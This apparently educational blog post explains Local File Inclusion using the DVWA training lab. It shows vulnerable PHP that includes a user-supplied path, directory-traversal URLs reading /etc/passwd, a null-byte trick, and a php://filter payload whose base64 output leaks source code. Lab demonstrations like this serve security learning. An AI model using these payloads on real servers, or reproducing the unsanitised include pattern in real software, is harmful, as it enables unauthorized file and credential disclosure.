i Local File Inclusion Attack – All things in moderation

Local File Inclusion Attack

Introduction

Local File Inclusion (LFI) is the process of including files, that are already locally present on the server. This vulnerability occurs when a user input contains the path to the file that has to be included. When such an input is not properly sanitized, the attacker may give some default file names and access unauthorized files, or an attacker may also make use of directory traversal characters (such as dot-dot-slash) and retrieve sensitive files available in other directories.

Example Local file inclusion in PHP

  • Consider following url:

http://192.168.223.128/dvwa/vulnerabilities/fi/?page=include.php

  • The value of “page” parameter is taken into the following PHP code, and the file is included:
<?php
    $file = $_GET['page'];
    include($file);
?>
  • To successfully test for this flaw, the tester needs to have knowledge of the system being tested and the location of the files being requested. Because There is no point requesting /etc/passwd from an IIS web server, each operating system uses different characters as path separator:

linux :

root directory: “/”

directory separator: “/”

Windows :

root directory: “:\”

directory separator: “\” or “/”

  • Now, an attacker can give malicious input in the “page” parameter which might retrieve unauthorized files present in the same directory, or he may use directory traversal characters like “../” to move to other directories. For example read user credentials in linux system by input “../../../../../../../../../etc/passwd”

http://192.168.223.128/dvwa/vulnerabilities/fi/?page=../../../../../../../../etc/passwd

  • In some cases, a file extension is a default type added to the user input during file inclusion, the best way to avoid the default extension to be added is by using null byte terminator “%00”.

http://192.168.223.128/dvwa/vulnerabilities/fi/?page=../../../../../../../../etc/passwd%00

  • If server enable php://filter wrapper this can help you read php file content.

I have write about php://filter in fllowing article: http://hydrasky.com/2016/10/18/php-local-file-inclusion-using-wrapper-phpfilter/

Example using php://filter for read php file content:

http://192.168.223.128/dvwa/vulnerabilities/fi/?page=php://filter/convert.base64-encode/resource=index.php

Then I receive content of the file index.php in base64-endcode.

“PD9waHANCg0KZGVmaW5lKCAnRFZXQV9XRUJfUEFHRV9UT19ST09UJywgJy4uLy4uLycgKTsNCnJlcXVpcmVfb25jZSBEVldBX1dFQl9QQUdFX1RPX1JPT1QuJ2R2d2EvaW5jbHVkZXMvZHZ3YVBhZ2UuaW5jLnBocCc7DQoNCmR2d2FQYWdlU3RhcnR1cCggYXJyYXkoICdhdXRoZW50aWNhdGVkJywgJ3BocGlkcycgKSApOw0KDQokcGFnZSA9IGR2d2FQYWdlTmV3R3JhYigpOw0KJHBhZ2VbICd0aXRsZScgXSAuPSAkcGFnZVsgJ3RpdGxlX3NlcGFyYXRvcicgXS4nVnVsbmVyYWJpbGl0eTogRmlsZSBJbmNsdXNpb24nOw0KJHBhZ2VbICdwYWdlX2lkJyBdID0gJ2ZpJzsNCg0KZHZ3YURhdGFiYXNlQ29ubmVjdCgpOw0KDQokdnVsbmVyYWJpbGl0eUZpbGUgPSAnJzsNCnN3aXRjaCggJF9DT09LSUVbJ3NlY3VyaXR5J10gKSB7DQoJY2FzZSAnbG93JzoNCgkJJHZ1bG5lcmFiaWxpdHlGaWxlID0gJ2xvdy5waHAnOw0KCQlicmVhazsNCg0KCWNhc2UgJ21lZGl1bSc6DQoJCSR2dWxuZXJhYmlsaXR5RmlsZSA9ICdtZWRpdW0ucGhwJzsNCgkJYnJlYWs7DQoNCgljYXNlICdoaWdoJzoNCglkZWZhdWx0Og0KCQkkdnVsbmVyYWJpbGl0eUZpbGUgPSAnaGlnaC5waHAnOw0KCQlicmVhazsNCn0NCg0KcmVxdWlyZV9vbmNlIERWV0FfV0VCX1BBR0VfVE9fUk9PVC4idnVsbmVyYWJpbGl0aWVzL2ZpL3NvdXJjZS97JHZ1bG5lcmFiaWxpdHlGaWxlfSI7DQoNCiRwYWdlWyAnaGVscF9idXR0b24nIF0gPSAnZmknOw0KJHBhZ2VbICdzb3VyY2VfYnV0dG9uJyBdID0gJ2ZpJzsNCg0KaW5jbHVkZSgkZmlsZSk7DQoNCmR2d2FIdG1sRWNobyggJHBhZ2UgKTsNCg0KPz4=”

Decode below string i have content of the file index.php

Once you’ve got the source code, you can inspect it for further vulnerabilities!

Reference

https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion

http://hakipedia.com/index.php/Local_File_Inclusion

Leave a Reply